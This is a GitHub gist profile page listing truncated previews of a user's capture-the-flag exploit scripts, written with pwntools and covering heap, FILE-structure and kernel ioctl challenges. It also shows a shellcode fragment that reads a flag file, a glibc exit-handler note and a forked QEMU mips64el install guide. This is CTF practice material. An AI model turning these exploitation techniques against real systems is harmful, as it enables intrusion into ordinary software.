Skip to content

Instantly share code, notes, and snippets.

View soez's full-sized avatar

soez soez

28 followers · 4 following
View GitHub Profile
@soez
soez / ctf.bsidesdelhi - data_bank.py
Created October 26, 2018 12:57
from pwn import *
def menu(n):
r.recvuntil(">> ")
r.sendline(str(n))
def add(idx, size, payload):
menu(1)
r.recvuntil("Enter the index:\n")
r.sendline(str(idx))
@soez
soez / ISITDTU CTF iz_heap_lv1.py
Created June 30, 2019 12:51
from pwn import *
def init(s):
io.recvuntil("Input name: ")
io.sendline(s)
def menu(n):
io.recvuntil("Choice: \n")
io.sendline(str(n))
@soez
soez / Tokyowesterns_5th-asterisk_alloc.py
Created September 3, 2019 16:41
# -*- coding:utf-8 -*-
from pwn import *
def menu(n):
io.recvuntil("Your choice: ")
io.sendline(str(n))
def malloc(sz, s):
menu(1)
io.recvuntil("Size: ")
@soez
soez / hack.lu_2019-kernel_baby_2.py
Created October 24, 2019 10:48
# -*- coding:utf-8 -*-
from pwn import *
IOCTL_READ = 901
IOCTL_WRITE = 902
OFFSET_COMM = 0x408
OFFSET_TASKS = 0x210
e = ELF('./vmlinux')
@soez
soez / 36C3CTF-onetimepad.py
Last active December 30, 2019 08:37
# coding: utf-8
from pwn import *
def menu(s):
io.recvuntil("> ")
io.sendline(s)
def write(s):
menu("w")
io.sendline(s)
@soez
soez / pwn2win_2020_ctf_command.py
Created May 31, 2020 16:56
# -*- coding:utf-8 -*-
from pwn import *
# based on https://dhavalkapil.com/blogs/FILE-Structure-Exploitation/
def pack_file(_flags = 0,
_IO_read_ptr = 0,
_IO_read_end = 0,
_IO_read_base = 0,
_IO_write_base = 0,
@soez
soez / babyrop.py
Last active February 6, 2022 22:56
babyrop_DiceCTF-2022
from pwn import *
import binascii
# open-read-write file
filename = "flag.txt"
body = "\x5f" # pop rdi
body += "\x80\x77" + chr(len(filename)) + "\x41" # xor byte [rdi + 11], 0x41 ; 11 = len(/etc/passwd)
body += "\x48\x31\xf6" # xor rsi, rsi
body += "\x48\x31\xc0" # xor rax, rax
@soez
soez / cache.py
Last active February 14, 2022 09:25
Defcamp-CTF-2022_cache
from pwn import *
local = False
libc = ELF("./libc.so.6", checksec = False)
binary = ELF("./vuln", checksec = False)
def menu(n):
io.recvuntil("\nChoice: ")
io.sendline(str(n))
@soez
soez / Tip
Last active September 13, 2022 18:35
# Glibc 2.35 Ubuntu 22.04
When exit is called, it passes by here... (Explaining without ASLR)
0x7ffff7daa390 <__run_exit_handlers>: endbr64
0x7ffff7daa394 <__run_exit_handlers+4>: push r15
0x7ffff7daa396 <__run_exit_handlers+6>: push r14
0x7ffff7daa398 <__run_exit_handlers+8>: push r13
0x7ffff7daa39a <__run_exit_handlers+10>: push r12
0x7ffff7daa39c <__run_exit_handlers+12>: mov r12,rsi
0x7ffff7daa39f <__run_exit_handlers+15>: push rbp
@soez
soez / mips64el-debian-qemu-exact-steps.md
Created September 24, 2022 06:48 — forked from bradfa/mips64el-debian-qemu-exact-steps.md
mips64el Debian QEMU install

Installing Debian Stretch mips64el Using QEMU

We're going to emulate the mips64el "malta" machine and install Debian Stretch using QEMU on a amd64 Debian Buster host.

Likely you need your user to be in the "libvirt" group and have installed these packages (or a subset of such):

sudo apt install qemu-system-mips virt-manager libguestfs-tools